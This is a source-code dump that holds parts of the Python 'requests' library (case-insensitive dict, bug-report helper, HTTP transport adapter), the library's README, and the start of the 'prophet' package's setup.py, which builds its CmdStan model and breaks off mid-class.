doesn't match the expected version range.""" File: src/requests/structures.py """ requests.structures ~~~~~~~~~~~~~~~~~~~ Data structures that power Requests. """ from collections import OrderedDict from .compat import Mapping, MutableMapping class CaseInsensitiveDict(MutableMapping): """A case-insensitive ``dict``-like object. Implements all methods and operations of ``MutableMapping`` as well as dict's ``copy``. Also provides ``lower_items``. All keys are expected to be strings. The structure remembers the case of the last key to be set, and ``iter(instance)``, ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()`` will contain case-sensitive keys. However, querying and contains testing is case insensitive:: cid = CaseInsensitiveDict() cid['Accept'] = 'application/json' cid['aCCEPT'] == 'application/json' # True list(cid) == ['Accept'] # True For example, ``headers['content-encoding']`` will return the value of a ``'Content-Encoding'`` response header, regardless of how the header name was originally stored. If the constructor, ``.update``, or equality comparison operations are given keys that have equal ``.lower()``s, the behavior is undefined. 
""" def __init__(self, data=None, **kwargs): self._store = OrderedDict() if data is None: data = {} self.update(data, **kwargs) def __setitem__(self, key, value): # Use the lowercased key for lookups, but store the actual # key alongside the value. self._store[key.lower()] = (key, value) def __getitem__(self, key): return self._store[key.lower()][1] def __delitem__(self, key): del self._store[key.lower()] def __iter__(self): return (casedkey for casedkey, mappedvalue in self._store.values()) def __len__(self): return len(self._store) def lower_items(self): """Like iteritems(), but with all lowercase keys.""" return ((lowerkey, keyval[1]) for (lowerkey, keyval) in self._store.items()) def __eq__(self, other): if isinstance(other, Mapping): other = CaseInsensitiveDict(other) else: return NotImplemented # Compare insensitively return dict(self.lower_items()) == dict(other.lower_items()) # Copy is required def copy(self): return CaseInsensitiveDict(self._store.values()) def __repr__(self): return str(dict(self.items())) class LookupDict(dict): """Dictionary lookup object.""" def __init__(self, name=None): self.name = name super().__init__() def __repr__(self): return f"<lookup '{self.name}'>" def __getitem__(self, key): # We allow fall-through here, so values default to None return self.__dict__.get(key, None) def get(self, key, default=None): return self.__dict__.get(key, default) File: src/requests/help.py """Module containing bug report helper(s).""" import json import platform import ssl import sys import idna import urllib3 from . import __version__ as requests_version try: import charset_normalizer except ImportError: charset_normalizer = None try: import chardet except ImportError: chardet = None try: from urllib3.contrib import pyopenssl except ImportError: pyopenssl = None OpenSSL = None cryptography = None else: import cryptography import OpenSSL def _implementation(): """Return a dict with the Python implementation and version. Provide both the name and the version of the Python implementation currently running. For example, on CPython 3.10.3 it will return {'name': 'CPython', 'version': '3.10.3'}. This function works best on CPython and PyPy: in particular, it probably doesn't work for Jython or IronPython. Future investigation should be done to work out the correct shape of the code for those platforms. 
""" implementation = platform.python_implementation() if implementation == "CPython": implementation_version = platform.python_version() elif implementation == "PyPy": implementation_version = "{}.{}.{}".format( sys.pypy_version_info.major, sys.pypy_version_info.minor, sys.pypy_version_info.micro, ) if sys.pypy_version_info.releaselevel != "final": implementation_version = "".join( [implementation_version, sys.pypy_version_info.releaselevel] ) elif implementation == "Jython": implementation_version = platform.python_version() # Complete Guess elif implementation == "IronPython": implementation_version = platform.python_version() # Complete Guess else: implementation_version = "Unknown" return {"name": implementation, "version": implementation_version} def info(): """Generate information for a bug report.""" try: platform_info = { "system": platform.system(), "release": platform.release(), } except OSError: platform_info = { "system": "Unknown", "release": "Unknown", } implementation_info = _implementation() urllib3_info = {"version": urllib3.__version__} charset_normalizer_info = {"version": None} chardet_info = {"version": None} if charset_normalizer: charset_normalizer_info = {"version": charset_normalizer.__version__} if chardet: chardet_info = {"version": chardet.__version__} pyopenssl_info = { "version": None, "openssl_version": "", } if OpenSSL: pyopenssl_info = { "version": OpenSSL.__version__, "openssl_version": f"{OpenSSL.SSL.OPENSSL_VERSION_NUMBER:x}", } cryptography_info = { "version": getattr(cryptography, "__version__", ""), } idna_info = { "version": getattr(idna, "__version__", ""), } system_ssl = ssl.OPENSSL_VERSION_NUMBER system_ssl_info = {"version": f"{system_ssl:x}" if system_ssl is not None else ""} return { "platform": platform_info, "implementation": implementation_info, "system_ssl": system_ssl_info, "using_pyopenssl": pyopenssl is not None, "using_charset_normalizer": chardet is None, "pyOpenSSL": pyopenssl_info, "urllib3": urllib3_info, "chardet": chardet_info, "charset_normalizer": charset_normalizer_info, "cryptography": cryptography_info, "idna": idna_info, "requests": { "version": requests_version, }, } def main(): """Pretty-print the bug information as JSON.""" print(json.dumps(info(), sort_keys=True, indent=2)) if __name__ == "__main__": main() File: src/requests/adapters.py """ requests.adapters ~~~~~~~~~~~~~~~~~ This module contains the transport adapters that Requests uses to define and maintain connections. 
""" import os.path import socket # noqa: F401 import typing import warnings from urllib3.exceptions import ClosedPoolError, ConnectTimeoutError from urllib3.exceptions import HTTPError as _HTTPError from urllib3.exceptions import InvalidHeader as _InvalidHeader from urllib3.exceptions import ( LocationValueError, MaxRetryError, NewConnectionError, ProtocolError, ) from urllib3.exceptions import ProxyError as _ProxyError from urllib3.exceptions import ReadTimeoutError, ResponseError from urllib3.exceptions import SSLError as _SSLError from urllib3.poolmanager import PoolManager, proxy_from_url from urllib3.util import Timeout as TimeoutSauce from urllib3.util import parse_url from urllib3.util.retry import Retry from urllib3.util.ssl_ import create_urllib3_context from .auth import _basic_auth_str from .compat import basestring, urlparse from .cookies import extract_cookies_to_jar from .exceptions import ( ConnectionError, ConnectTimeout, InvalidHeader, InvalidProxyURL, InvalidSchema, InvalidURL, ProxyError, ReadTimeout, RetryError, SSLError, ) from .models import Response from .structures import CaseInsensitiveDict from .utils import ( DEFAULT_CA_BUNDLE_PATH, extract_zipped_paths, get_auth_from_url, get_encoding_from_headers, prepend_scheme_if_needed, select_proxy, urldefragauth, ) try: from urllib3.contrib.socks import SOCKSProxyManager except ImportError: def SOCKSProxyManager(*args, **kwargs): raise InvalidSchema("Missing dependencies for SOCKS support.") if typing.TYPE_CHECKING: from .models import PreparedRequest DEFAULT_POOLBLOCK = False DEFAULT_POOLSIZE = 10 DEFAULT_RETRIES = 0 DEFAULT_POOL_TIMEOUT = None try: import ssl # noqa: F401 _preloaded_ssl_context = create_urllib3_context() _preloaded_ssl_context.load_verify_locations( extract_zipped_paths(DEFAULT_CA_BUNDLE_PATH) ) except ImportError: # Bypass default SSLContext creation when Python # interpreter isn't built with the ssl module. _preloaded_ssl_context = None def _urllib3_request_context( request: "PreparedRequest", verify: "bool | str | None", client_cert: "typing.Tuple[str, str] | str | None", poolmanager: "PoolManager", ) -> "(typing.Dict[str, typing.Any], typing.Dict[str, typing.Any])": host_params = {} pool_kwargs = {} parsed_request_url = urlparse(request.url) scheme = parsed_request_url.scheme.lower() port = parsed_request_url.port # Determine if we have and should use our default SSLContext # to optimize performance on standard requests. 
poolmanager_kwargs = getattr(poolmanager, "connection_pool_kw", {}) has_poolmanager_ssl_context = poolmanager_kwargs.get("ssl_context") should_use_default_ssl_context = ( _preloaded_ssl_context is not None and not has_poolmanager_ssl_context ) cert_reqs = "CERT_REQUIRED" if verify is False: cert_reqs = "CERT_NONE" elif verify is True and should_use_default_ssl_context: pool_kwargs["ssl_context"] = _preloaded_ssl_context elif isinstance(verify, str): if not os.path.isdir(verify): pool_kwargs["ca_certs"] = verify else: pool_kwargs["ca_cert_dir"] = verify pool_kwargs["cert_reqs"] = cert_reqs if client_cert is not None: if isinstance(client_cert, tuple) and len(client_cert) == 2: pool_kwargs["cert_file"] = client_cert[0] pool_kwargs["key_file"] = client_cert[1] else: # According to our docs, we allow users to specify just the client # cert path pool_kwargs["cert_file"] = client_cert host_params = { "scheme": scheme, "host": parsed_request_url.hostname, "port": port, } return host_params, pool_kwargs class BaseAdapter: """The Base Transport Adapter""" def __init__(self): super().__init__() def send( self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None ): """Sends PreparedRequest object. Returns Response object. :param request: The :class:`PreparedRequest <PreparedRequest>` being sent. :param stream: (optional) Whether to stream the request content. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use :param cert: (optional) Any user-provided SSL certificate to be trusted. :param proxies: (optional) The proxies dictionary to apply to the request. """ raise NotImplementedError def close(self): """Cleans up adapter specific items.""" raise NotImplementedError class HTTPAdapter(BaseAdapter): """The built-in HTTP Adapter for urllib3. Provides a general-case interface for Requests sessions to contact HTTP and HTTPS urls by implementing the Transport Adapter interface. This class will usually be created by the :class:`Session <Session>` class under the covers. :param pool_connections: The number of urllib3 connection pools to cache. :param pool_maxsize: The maximum number of connections to save in the pool. :param max_retries: The maximum number of retries each connection should attempt. Note, this applies only to failed DNS lookups, socket connections and connection timeouts, never to requests where data has made it to the server. By default, Requests does not retry failed connections. If you need granular control over the conditions under which we retry a request, import urllib3's ``Retry`` class and pass that instead. :param pool_block: Whether the connection pool should block for connections. 
Usage:: >>> import requests >>> s = requests.Session() >>> a = requests.adapters.HTTPAdapter(max_retries=3) >>> s.mount('http://', a) """ __attrs__ = [ "max_retries", "config", "_pool_connections", "_pool_maxsize", "_pool_block", ] def __init__( self, pool_connections=DEFAULT_POOLSIZE, pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES, pool_block=DEFAULT_POOLBLOCK, ): if max_retries == DEFAULT_RETRIES: self.max_retries = Retry(0, read=False) else: self.max_retries = Retry.from_int(max_retries) self.config = {} self.proxy_manager = {} super().__init__() self._pool_connections = pool_connections self._pool_maxsize = pool_maxsize self._pool_block = pool_block self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block) def __getstate__(self): return {attr: getattr(self, attr, None) for attr in self.__attrs__} def __setstate__(self, state): # Can't handle by adding 'proxy_manager' to self.__attrs__ because # self.poolmanager uses a lambda function, which isn't pickleable. self.proxy_manager = {} self.config = {} for attr, value in state.items(): setattr(self, attr, value) self.init_poolmanager( self._pool_connections, self._pool_maxsize, block=self._pool_block ) def init_poolmanager( self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs ): """Initializes a urllib3 PoolManager. This method should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param connections: The number of urllib3 connection pools to cache. :param maxsize: The maximum number of connections to save in the pool. :param block: Block when no free connections are available. :param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager. """ # save these values for pickling self._pool_connections = connections self._pool_maxsize = maxsize self._pool_block = block self.poolmanager = PoolManager( num_pools=connections, maxsize=maxsize, block=block, **pool_kwargs, ) def proxy_manager_for(self, proxy, **proxy_kwargs): """Return urllib3 ProxyManager for the given proxy. This method should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param proxy: The proxy to return a urllib3 ProxyManager for. :param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager. :returns: ProxyManager :rtype: urllib3.ProxyManager """ if proxy in self.proxy_manager: manager = self.proxy_manager[proxy] elif proxy.lower().startswith("socks"): username, password = get_auth_from_url(proxy) manager = self.proxy_manager[proxy] = SOCKSProxyManager( proxy, username=username, password=password, num_pools=self._pool_connections, maxsize=self._pool_maxsize, block=self._pool_block, **proxy_kwargs, ) else: proxy_headers = self.proxy_headers(proxy) manager = self.proxy_manager[proxy] = proxy_from_url( proxy, proxy_headers=proxy_headers, num_pools=self._pool_connections, maxsize=self._pool_maxsize, block=self._pool_block, **proxy_kwargs, ) return manager def cert_verify(self, conn, url, verify, cert): """Verify a SSL certificate. This method should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param conn: The urllib3 connection object associated with the cert. :param url: The requested URL. 
:param verify: Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use :param cert: The SSL certificate to verify. """ if url.lower().startswith("https") and verify: conn.cert_reqs = "CERT_REQUIRED" # Only load the CA certificates if 'verify' is a string indicating the CA bundle to use. # Otherwise, if verify is a boolean, we don't load anything since # the connection will be using a context with the default certificates already loaded, # and this avoids a call to the slow load_verify_locations() if verify is not True: # `verify` must be a str with a path then cert_loc = verify if not os.path.exists(cert_loc): raise OSError( f"Could not find a suitable TLS CA certificate bundle, " f"invalid path: {cert_loc}" ) if not os.path.isdir(cert_loc): conn.ca_certs = cert_loc else: conn.ca_cert_dir = cert_loc else: conn.cert_reqs = "CERT_NONE" conn.ca_certs = None conn.ca_cert_dir = None if cert: if not isinstance(cert, basestring): conn.cert_file = cert[0] conn.key_file = cert[1] else: conn.cert_file = cert conn.key_file = None if conn.cert_file and not os.path.exists(conn.cert_file): raise OSError( f"Could not find the TLS certificate file, " f"invalid path: {conn.cert_file}" ) if conn.key_file and not os.path.exists(conn.key_file): raise OSError( f"Could not find the TLS key file, invalid path: {conn.key_file}" ) def build_response(self, req, resp): """Builds a :class:`Response <requests.Response>` object from a urllib3 response. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>` :param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response. :param resp: The urllib3 response object. :rtype: requests.Response """ response = Response() # Fallback to None if there's no status_code, for whatever reason. response.status_code = getattr(resp, "status", None) # Make headers case-insensitive. response.headers = CaseInsensitiveDict(getattr(resp, "headers", {})) # Set encoding. response.encoding = get_encoding_from_headers(response.headers) response.raw = resp response.reason = response.raw.reason if isinstance(req.url, bytes): response.url = req.url.decode("utf-8") else: response.url = req.url # Add new cookies from the server. extract_cookies_to_jar(response.cookies, req, resp) # Give the Response some context. response.request = req response.connection = self return response def build_connection_pool_key_attributes(self, request, verify, cert=None): """Build the PoolKey attributes used by urllib3 to return a connection. This looks at the PreparedRequest, the user-specified verify value, and the value of the cert parameter to determine what PoolKey values to use to select a connection from a given urllib3 Connection Pool. The SSL related pool key arguments are not consistently set. As of this writing, use the following to determine what keys may be in that dictionary: * If ``verify`` is ``True``, ``"ssl_context"`` will be set and will be the default Requests SSL Context * If ``verify`` is ``False``, ``"ssl_context"`` will not be set but ``"cert_reqs"`` will be set * If ``verify`` is a string, (i.e., it is a user-specified trust bundle) ``"ca_certs"`` will be set if the string is not a directory recognized by :py:func:`os.path.isdir`, otherwise ``"ca_certs_dir"`` will be set. * If ``"cert"`` is specified, ``"cert_file"`` will always be set. 
If ``"cert"`` is a tuple with a second item, ``"key_file"`` will also be present To override these settings, one may subclass this class, call this method and use the above logic to change parameters as desired. For example, if one wishes to use a custom :py:class:`ssl.SSLContext` one must both set ``"ssl_context"`` and based on what else they require, alter the other keys to ensure the desired behaviour. :param request: The PreparedReqest being sent over the connection. :type request: :class:`~requests.models.PreparedRequest` :param verify: Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. :param cert: (optional) Any user-provided SSL certificate for client authentication (a.k.a., mTLS). This may be a string (i.e., just the path to a file which holds both certificate and key) or a tuple of length 2 with the certificate file path and key file path. :returns: A tuple of two dictionaries. The first is the "host parameters" portion of the Pool Key including scheme, hostname, and port. The second is a dictionary of SSLContext related parameters. """ return _urllib3_request_context(request, verify, cert, self.poolmanager) def get_connection_with_tls_context(self, request, verify, proxies=None, cert=None): """Returns a urllib3 connection for the given request and TLS settings. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param request: The :class:`PreparedRequest <PreparedRequest>` object to be sent over the connection. :param verify: Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. :param proxies: (optional) The proxies dictionary to apply to the request. :param cert: (optional) Any user-provided SSL certificate to be used for client authentication (a.k.a., mTLS). :rtype: urllib3.ConnectionPool """ proxy = select_proxy(request.url, proxies) try: host_params, pool_kwargs = self.build_connection_pool_key_attributes( request, verify, cert, ) except ValueError as e: raise InvalidURL(e, request=request) if proxy: proxy = prepend_scheme_if_needed(proxy, "http") proxy_url = parse_url(proxy) if not proxy_url.host: raise InvalidProxyURL( "Please check proxy URL. It is malformed " "and could be missing the host." ) proxy_manager = self.proxy_manager_for(proxy) conn = proxy_manager.connection_from_host( **host_params, pool_kwargs=pool_kwargs ) else: # Only scheme should be lower case conn = self.poolmanager.connection_from_host( **host_params, pool_kwargs=pool_kwargs ) return conn def get_connection(self, url, proxies=None): """DEPRECATED: Users should move to `get_connection_with_tls_context` for all subclasses of HTTPAdapter using Requests>=2.32.2. Returns a urllib3 connection for the given URL. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param url: The URL to connect to. :param proxies: (optional) A Requests-style dictionary of proxies used on this request. :rtype: urllib3.ConnectionPool """ warnings.warn( ( "`get_connection` has been deprecated in favor of " "`get_connection_with_tls_context`. Custom HTTPAdapter subclasses " "will need to migrate for Requests>=2.32.2. Please see " "https://github.com/psf/requests/pull/6710 for more details." 
), DeprecationWarning, ) proxy = select_proxy(url, proxies) if proxy: proxy = prepend_scheme_if_needed(proxy, "http") proxy_url = parse_url(proxy) if not proxy_url.host: raise InvalidProxyURL( "Please check proxy URL. It is malformed " "and could be missing the host." ) proxy_manager = self.proxy_manager_for(proxy) conn = proxy_manager.connection_from_url(url) else: # Only scheme should be lower case parsed = urlparse(url) url = parsed.geturl() conn = self.poolmanager.connection_from_url(url) return conn def close(self): """Disposes of any internal state. Currently, this closes the PoolManager and any active ProxyManager, which closes any pooled connections. """ self.poolmanager.clear() for proxy in self.proxy_manager.values(): proxy.clear() def request_url(self, request, proxies): """Obtain the url to use when making the final request. If the message is being sent through a HTTP proxy, the full URL has to be used. Otherwise, we should only use the path portion of the URL. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param request: The :class:`PreparedRequest <PreparedRequest>` being sent. :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs. :rtype: str """ proxy = select_proxy(request.url, proxies) scheme = urlparse(request.url).scheme is_proxied_http_request = proxy and scheme != "https" using_socks_proxy = False if proxy: proxy_scheme = urlparse(proxy).scheme.lower() using_socks_proxy = proxy_scheme.startswith("socks") url = request.path_url if url.startswith("//"): # Don't confuse urllib3 url = f"/{url.lstrip('/')}" if is_proxied_http_request and not using_socks_proxy: url = urldefragauth(request.url) return url def add_headers(self, request, **kwargs): """Add any headers needed by the connection. As of v2.0 this does nothing by default, but is left for overriding by users that subclass the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to. :param kwargs: The keyword arguments from the call to send(). """ pass def proxy_headers(self, proxy): """Returns a dictionary of the headers to add to any request sent through a proxy. This works with urllib3 magic to ensure that they are correctly sent to the proxy, rather than in a tunnelled request if CONNECT is being used. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param proxy: The url of the proxy being used for this request. :rtype: dict """ headers = {} username, password = get_auth_from_url(proxy) if username: headers["Proxy-Authorization"] = _basic_auth_str(username, password) return headers def send( self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None ): """Sends PreparedRequest object. Returns Response object. :param request: The :class:`PreparedRequest <PreparedRequest>` being sent. :param stream: (optional) Whether to stream the request content. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. 
:type timeout: float or tuple or urllib3 Timeout object :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use :param cert: (optional) Any user-provided SSL certificate to be trusted. :param proxies: (optional) The proxies dictionary to apply to the request. :rtype: requests.Response """ try: conn = self.get_connection_with_tls_context( request, verify, proxies=proxies, cert=cert ) except LocationValueError as e: raise InvalidURL(e, request=request) self.cert_verify(conn, request.url, verify, cert) url = self.request_url(request, proxies) self.add_headers( request, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies, ) chunked = not (request.body is None or "Content-Length" in request.headers) if isinstance(timeout, tuple): try: connect, read = timeout timeout = TimeoutSauce(connect=connect, read=read) except ValueError: raise ValueError( f"Invalid timeout {timeout}. Pass a (connect, read) timeout tuple, " f"or a single float to set both timeouts to the same value." ) elif isinstance(timeout, TimeoutSauce): pass else: timeout = TimeoutSauce(connect=timeout, read=timeout) try: resp = conn.urlopen( method=request.method, url=url, body=request.body, headers=request.headers, redirect=False, assert_same_host=False, preload_content=False, decode_content=False, retries=self.max_retries, timeout=timeout, chunked=chunked, ) except (ProtocolError, OSError) as err: raise ConnectionError(err, request=request) except MaxRetryError as e: if isinstance(e.reason, ConnectTimeoutError): # TODO: Remove this in 3.0.0: see #2811 if not isinstance(e.reason, NewConnectionError): raise ConnectTimeout(e, request=request) if isinstance(e.reason, ResponseError): raise RetryError(e, request=request) if isinstance(e.reason, _ProxyError): raise ProxyError(e, request=request) if isinstance(e.reason, _SSLError): # This branch is for urllib3 v1.22 and later. raise SSLError(e, request=request) raise ConnectionError(e, request=request) except ClosedPoolError as e: raise ConnectionError(e, request=request) except _ProxyError as e: raise ProxyError(e) except (_SSLError, _HTTPError) as e: if isinstance(e, _SSLError): # This branch is for urllib3 versions earlier than v1.22 raise SSLError(e, request=request) elif isinstance(e, ReadTimeoutError): raise ReadTimeout(e, request=request) elif isinstance(e, _InvalidHeader): raise InvalidHeader(e, request=request) else: raise return self.build_response(request, resp)
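# ---------------------------------------------------------------------------
# Illustrative sketch only (not part of requests itself): ``HTTPAdapter.send``
# above accepts ``timeout`` as a float, a ``(connect, read)`` tuple, or a
# urllib3 ``Timeout`` object, but no timeout is applied when the caller omits
# one. A subclass that supplies a default timeout could look like the
# following; the class name and the 5/30 second values are assumptions made
# up for this example.

class _ExampleDefaultTimeoutAdapter(HTTPAdapter):
    """Apply a default (connect, read) timeout unless one is provided."""

    def send(self, request, **kwargs):
        # Session passes stream/timeout/verify/cert/proxies as keyword args.
        if kwargs.get("timeout") is None:
            kwargs["timeout"] = (5, 30)  # hypothetical default timeouts
        return super().send(request, **kwargs)

# Usage sketch:
#
#     import requests
#     session = requests.Session()
#     session.mount("https://", _ExampleDefaultTimeoutAdapter())
#     session.get("https://example.org")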
# Requests

**Requests** is a simple, yet elegant, HTTP library.

```python
>>> import requests
>>> r = requests.get('https://httpbin.org/basic-auth/user/pass', auth=('user', 'pass'))
>>> r.status_code
200
>>> r.headers['content-type']
'application/json; charset=utf8'
>>> r.encoding
'utf-8'
>>> r.text
'{"authenticated": true, ...'
>>> r.json()
{'authenticated': True, ...}
```

Requests allows you to send HTTP/1.1 requests extremely easily. There’s no need to manually add query strings to your URLs, or to form-encode your `PUT` & `POST` data; for JSON payloads, just use the `json` parameter!

Requests is one of the most downloaded Python packages today, pulling in around `30M downloads / week`. According to GitHub, Requests is currently [depended upon](https://github.com/psf/requests/network/dependents?package_id=UGFja2FnZS01NzA4OTExNg%3D%3D) by `1,000,000+` repositories. You may certainly put your trust in this code.

[![Downloads](https://static.pepy.tech/badge/requests/month)](https://pepy.tech/project/requests)
[![Supported Versions](https://img.shields.io/pypi/pyversions/requests.svg)](https://pypi.org/project/requests)
[![Contributors](https://img.shields.io/github/contributors/psf/requests.svg)](https://github.com/psf/requests/graphs/contributors)

## Installing Requests and Supported Versions

Requests is available on PyPI:

```console
$ python -m pip install requests
```

Requests officially supports Python 3.8+.

## Supported Features & Best–Practices

Requests is ready for the demands of building robust and reliable HTTP–speaking applications:

- Keep-Alive & Connection Pooling
- International Domains and URLs
- Sessions with Cookie Persistence
- Browser-style TLS/SSL Verification
- Basic & Digest Authentication
- Familiar `dict`–like Cookies
- Automatic Content Decompression and Decoding
- Multi-part File Uploads
- SOCKS Proxy Support
- Connection Timeouts
- Streaming Downloads
- Automatic honoring of `.netrc`
- Chunked HTTP Requests

## API Reference and User Guide available on [Read the Docs](https://requests.readthedocs.io)

[![Read the Docs](https://raw.githubusercontent.com/psf/requests/main/ext/ss.png)](https://requests.readthedocs.io)

## Cloning the repository

When cloning the Requests repository, you may need to add the `-c fetch.fsck.badTimezone=ignore` flag to avoid an error about a bad commit (see [this issue](https://github.com/psf/requests/issues/2690) for more background):

```shell
git clone -c fetch.fsck.badTimezone=ignore https://github.com/psf/requests.git
```

You can also apply this setting to your global Git config:

```shell
git config --global fetch.fsck.badTimezone ignore
```

---

[![Kenneth Reitz](https://raw.githubusercontent.com/psf/requests/main/ext/kr.png)](https://kennethreitz.org) [![Python Software Foundation](https://raw.githubusercontent.com/psf/requests/main/ext/psf.png)](https://www.python.org/psf)
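As a small illustration of two of the features listed above (streaming downloads and connection timeouts), the following sketch saves a large response to disk in chunks; the URL, filename, chunk size, and timeout values are arbitrary placeholders:

```python
import requests

# Stream the body instead of loading it into memory at once, and fail fast
# if the server is slow to connect (3.05 s) or to send data (27 s).
url = "https://example.org/big-file.bin"  # placeholder URL
with requests.get(url, stream=True, timeout=(3.05, 27)) as r:
    r.raise_for_status()
    with open("big-file.bin", "wb") as fh:
        for chunk in r.iter_content(chunk_size=8192):
            fh.write(chunk)
```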
prophet
36421b70f077cc657f143161de5a97f5a214e18b
File: python/setup.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import os import platform from pathlib import Path from shutil import copy, copytree, rmtree from typing import List import tempfile from setuptools import find_packages, setup, Extension from setuptools.command.build_ext import build_ext from setuptools.command.build_py import build_py from setuptools.command.editable_wheel import editable_wheel from wheel.bdist_wheel import bdist_wheel MODEL_DIR = "stan" MODEL_TARGET_DIR = os.path.join("prophet", "stan_model") CMDSTAN_VERSION = "2.33.1" BINARIES_DIR = "bin" BINARIES = ["diagnose", "print", "stanc", "stansummary"] TBB_PARENT = "stan/lib/stan_math/lib" TBB_DIRS = ["tbb", "tbb_2020.3"] IS_WINDOWS = platform.platform().startswith("Win") def prune_cmdstan(cmdstan_dir: str) -> None: """ Keep only the cmdstan executables and tbb files (minimum required to run a cmdstanpy commands on a pre-compiled model). """ original_dir = Path(cmdstan_dir).resolve() parent_dir = original_dir.parent temp_dir = parent_dir / "temp" if temp_dir.is_dir(): rmtree(temp_dir) temp_dir.mkdir() print("Copying ", original_dir, " to ", temp_dir, " for pruning") copytree(original_dir / BINARIES_DIR, temp_dir / BINARIES_DIR) for f in (temp_dir / BINARIES_DIR).iterdir(): if f.is_dir(): rmtree(f) elif f.is_file() and f.stem not in BINARIES: os.remove(f) for tbb_dir in TBB_DIRS: copytree(original_dir / TBB_PARENT / tbb_dir, temp_dir / TBB_PARENT / tbb_dir) rmtree(original_dir) temp_dir.rename(original_dir) def repackage_cmdstan(): return os.environ.get("PROPHET_REPACKAGE_CMDSTAN", "").lower() not in ["false", "0"] def maybe_install_cmdstan_toolchain() -> bool: """Install C++ compilers required to build stan models on Windows machines.""" import cmdstanpy try: cmdstanpy.utils.cxx_toolchain_path() return False except Exception: try: from cmdstanpy.install_cxx_toolchain import run_rtools_install except ImportError: # older versions from cmdstanpy.install_cxx_toolchain import main as run_rtools_install run_rtools_install({"version": None, "dir": None, "verbose": True}) cmdstanpy.utils.cxx_toolchain_path() return True def install_cmdstan_deps(cmdstan_dir: Path): import cmdstanpy from multiprocessing import cpu_count if repackage_cmdstan(): if IS_WINDOWS: maybe_install_cmdstan_toolchain() print("Installing cmdstan to", cmdstan_dir) if os.path.isdir(cmdstan_dir): rmtree(cmdstan_dir) if not cmdstanpy.install_cmdstan( version=CMDSTAN_VERSION, dir=cmdstan_dir.parent, overwrite=True, verbose=True, cores=cpu_count(), progress=True, ): raise RuntimeError("CmdStan failed to install in repackaged directory") def build_cmdstan_model(target_dir): """ Rebuild cmdstan in the build environment, then use this installation to compile the stan model. The stan model is copied to {target_dir}/prophet_model.bin The cmdstan files required to run cmdstanpy commands are copied to {target_dir}/cmdstan-{version}. Parameters ---------- target_dir: Directory to copy the compiled model executable and core cmdstan files to. 
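    Illustrative call (this mirrors how ``build_models`` below uses it; the
    path is a made-up example)::

        build_cmdstan_model("build/lib/prophet/stan_model")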
""" import cmdstanpy target_cmdstan_dir = (Path(target_dir) / f"cmdstan-{CMDSTAN_VERSION}").resolve() with tempfile.TemporaryDirectory() as tmp_dir: # long paths on windows can cause problems during build if IS_WINDOWS: cmdstan_dir = (Path(tmp_dir) / f"cmdstan-{CMDSTAN_VERSION}").resolve() else: cmdstan_dir = target_cmdstan_dir install_cmdstan_deps(cmdstan_dir) model_name = "prophet.stan" # note: ensure copy target is a directory not a file. temp_stan_file = copy(os.path.join(MODEL_DIR, model_name), cmdstan_dir.parent.resolve()) sm = cmdstanpy.CmdStanModel(stan_file=temp_stan_file) target_name = "prophet_model.bin" copy(sm.exe_file, os.path.join(target_dir, target_name)) if IS_WINDOWS and repackage_cmdstan(): copytree(cmdstan_dir, target_cmdstan_dir) # Clean up for f in Path(MODEL_DIR).iterdir(): if f.is_file() and f.name != model_name: os.remove(f) if repackage_cmdstan(): prune_cmdstan(target_cmdstan_dir) def get_backends_from_env() -> List[str]: return os.environ.get("STAN_BACKEND", "CMDSTANPY").split(",") def build_models(target_dir): print("Compiling cmdstanpy model") build_cmdstan_model(target_dir) if "PYSTAN" in get_backends_from_env(): raise ValueError("PyStan backend is not supported for Prophet >= 1.1") class BuildPyCommand(build_py): """Custom build command to pre-compile Stan models.""" def run(self): if not self.dry_run: target_dir = os.path.join(self.build_lib, MODEL_TARGET_DIR) self.mkpath(target_dir) build_models(target_dir) build_py.run(self) class BuildExtCommand(build_ext): """Ensure built extensions are added to the correct path in the wheel.""" def run(self): pass class EditableWheel(editable_wheel): """Custom develop command to pre-compile Stan models in-place.""" def run(self): if not self.dry_run: target_dir = os.path.join(self.project_dir, MODEL_TARGET_DIR) self.mkpath(target_dir) build_models(target_dir) editable_wheel.run(self) class 